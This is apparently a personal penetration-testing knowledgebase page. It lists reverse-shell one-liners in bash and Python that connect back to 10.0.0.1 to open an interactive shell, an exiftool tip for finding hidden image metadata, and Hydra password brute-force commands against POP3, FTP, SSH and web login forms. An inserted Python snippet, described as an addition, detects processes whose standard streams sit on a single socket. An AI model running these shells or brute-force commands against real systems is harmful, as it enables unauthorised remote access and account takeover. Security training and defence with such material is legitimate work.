Tikejhya: Ashish Nepal

Knowledgebase

Category: pentest

reverse shell


Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ref: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
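A defender's counterpart to the two one-liners above, added here as an example and not part of the original post: both redirect the shell's stdin, stdout and stderr onto a single TCP socket, so on a Linux host such a process can be spotted by reading /proc/<pid>/fd and checking whether fds 0, 1 and 2 all resolve to the same socket inode. The function names and the sample fd tables are assumptions of this example.

```python
import os
import re
from typing import Dict, Iterable, List, Optional, Tuple

# readlink() on /proc/<pid>/fd/<n> returns "socket:[<inode>]" for a socket
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")

# Constructed sample: the fd table of the one-liners above after the
# dup2/redirect (all three stdio fds are the same socket inode).
SAMPLE_REVERSE_SHELL = {0: "socket:[4242]", 1: "socket:[4242]", 2: "socket:[4242]"}
SAMPLE_NORMAL_SHELL = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}

def stdio_on_one_socket(fd_targets: Dict[int, str]) -> bool:
    """True when fds 0, 1 and 2 all resolve to the same socket inode."""
    targets = [fd_targets.get(fd) for fd in (0, 1, 2)]
    if any(t is None for t in targets):
        return False
    return len(set(targets)) == 1 and bool(SOCKET_RE.match(targets[0]))

def read_fd_targets(pid: int) -> Dict[int, str]:
    """fd number -> link target for a live process, read from /proc (Linux)."""
    result: Dict[int, str] = {}
    fd_dir = f"/proc/{pid}/fd"
    try:
        names = os.listdir(fd_dir)
    except OSError:  # process gone, or no permission (run as root to see all)
        return result
    for name in names:
        try:
            result[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue
    return result

def find_suspect_pids(pids: Optional[Iterable[int]] = None) -> List[Tuple[int, str]]:
    """Return (pid, comm) for every process whose stdio is a single socket."""
    if pids is None:
        pids = [int(p) for p in os.listdir("/proc") if p.isdigit()]
    hits = []
    for pid in pids:
        if stdio_on_one_socket(read_fd_targets(pid)):
            try:
                with open(f"/proc/{pid}/comm") as f:
                    comm = f.read().strip()
            except OSError:
                comm = "?"
            hits.append((pid, comm))
    return hits
```

Call find_suspect_pids() as root to scan every process; services spawned by inetd-style superservers also have their stdio on a socket, so treat a hit as a lead to inspect rather than a verdict.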

steganography & exiftool


Using steganography, secret messages can be embedded into images.

Using exiftool to discover a base64-encoded message in the image metadata:

apt install libimage-exiftool-perl
exiftool /tmp/for-007.jpg


hydra [by example]


hydra -L Boris -P /usr/share/wordlists/fasttrack.txt -t20 172.28.128.3 -s55007 -I pop3

Hydra is a parallelized login cracker which supports numerous protocols.

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra 172.28.128.5 http-post-form "/path/index.php:key=^PASS^:invalid key" -l username -P /usr/share/dict/words -t 10 -w 30 -o hydra-http-post-attack.txt

Quick tip: to submit both a username and a password, use two placeholders in the form string: "user=^USER^&pass=^PASS^:Bad login"

Breakdown of the command above:
Host = 172.28.128.5
Method = http-post-form
URL = /path/index.php
Form parameters = key=^PASS^
Failure response = invalid key
Users file = users.txt
Password file = /usr/share/dict/words
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt
